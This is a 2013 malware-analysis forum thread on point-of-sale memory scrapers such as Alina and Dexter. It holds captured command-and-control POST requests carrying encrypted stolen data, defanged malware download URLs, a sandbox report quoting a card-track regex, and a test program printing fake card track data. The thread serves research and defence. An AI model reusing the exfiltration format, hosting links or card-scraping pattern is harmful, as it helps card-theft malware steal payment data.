A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18009  by bsteo
 Sun Feb 03, 2013 12:02 pm
Awsome xylitol, you've just ruined my sunday :)
Now I have work to do.

Just took a look at the second sample (v2.1) from your previous post. He sent to my fake PHP panel this:
Code: Select all
DATA: a:5:{s:3:"act";s:1:"l";s:1:"b";s:8:"982f17d9";s:1:"c";s:15:"XTMTRX-8D35CB4";s:1:"v";s:4:"v2.1";s:5:"ldata";s:326:"f0c2c5d8dfcac7c7c8c3cec8c091999bf68befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce8bcac7c2c5ca96e891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7efced8c0dfc4dbf7c9c4dff4cecf85ced3cea1f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df68bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf8bd8dec8c8ced8d8cddec7c7d2a1";}
Now figuring out what's the encryption on the POST variable "ldata" (log data).
 #18010  by Xylitol
 Sun Feb 03, 2013 12:26 pm
Alina 3.4 Sample in attach
In the wild: hxtp://pierremoreau.ca/backup2011/3_4.exe
https://www.virustotal.com/file/036e4f4 ... 359894166/ > 28/46
Code: Select all
POST /forum/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v3.4
Host: 208.98.63.228
Content-Length: 642
Cache-Control: no-cache

act=l&b=8a43ad2&c=XYL2K-E87171510&v=v3.4&p=C:\3_4.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9a9c8b979b95f68befcec7cedfcecf8be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7dcc2c586cdc2d9cedccac7c785ced3ce8bcdd9c4c68bc4c7cf8bd8cedfdedb858bcfcec7cedfc2c5cc8bcadedfc4d8dfcad9df85a1f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1ded8c8c3cecf85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f798f49f85ced3cea1HTTP/1.1 666 OK
Server: nginx/1.0.15
Date: Sun, 03 Feb 2013 12:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

8
li:2:120
0
Attachments
infected
(59.4 KiB) Downloaded 122 times
 #18013  by aaSSfxxx
 Sun Feb 03, 2013 5:32 pm
Btw got new stuff on hXXp://royjamesinsurance.com/images/ .

This time, no sql server creds in command strings :( (malware attached).
Same shit than the sample i posted before.
https://www.virustotal.com/file/6d4d91f ... 359968332/ > 10/46
Attachments
infected
(35.54 KiB) Downloaded 89 times
Last edited by Xylitol on Mon Feb 04, 2013 9:00 am, edited 1 time in total. Reason: Link obfuscation
 #18042  by Buster_BSA
 Tue Feb 05, 2013 4:38 pm
Xylitol wrote:fresh Troj/Trackr-Gen
https://www.virustotal.com/file/f72a63c ... 360071120/ > 19/46
Code: Select all

 Report generated with Buster Sandbox Analyzer 1.87 at 17:36:13 on 05/02/2013

 [ General information ]
   * Analysis duration: 00:00:30
   * File name: c:\m\test\f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8.exe
   * File length: 128000 bytes
   * File signature (PEiD): Borland Delphi 6.0 - 7.0
   * File signature (Exeinfo): Borland Delphi ( 2.0 - 7.0 ) 1992 - www.borland.com
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 6.50491 (81.3113%)
   * ssdeep signature: 3072:giYkr6DJ2ZUSlcCwDesr/QOOGXbn4DQFu/U3buRKlemZ9DnGAeJo5CQh6BrUO3ss:Bv+KFiDXL4DQFu/U3buRKlemZ9DnGAeK
   * Adobe Malware Classifier: Malicious
   * Digital signature: Unsigned
   * MD5 hash: aef00dcd16d6aad056a345ac320a8d99
   * SHA1 hash: 48db3a315d9e8bc0bce2c99cfde3bb9224af3dce
   * SHA256 hash: f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * No changes

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Enumerates running processes.
   * Contains string Point-of-sale information stealer ("((b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1})")
   * Sleeps 30 seconds.
 #18055  by bsteo
 Wed Feb 06, 2013 3:36 pm
gritland wrote:someone has a unpacked version of Dexter?
Interested too. I unpacked one with Volatility but seems I've broken it somewhere, it runs but gives error.
 #18059  by bsteo
 Wed Feb 06, 2013 4:32 pm
Little harmless code I made to trigger any POS malware to grab and send data to C&C . Attached compiled with VS10. Code as follows:
Code: Select all
#include <iostream>
#include <conio.h>
#include <windows.h>

using namespace std;

char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	getch();
	return 0;
}
Attachments
password: "infected"
(44.55 KiB) Downloaded 168 times
  • 1
  • 4
  • 5
  • 6
  • 7
  • 8
  • 25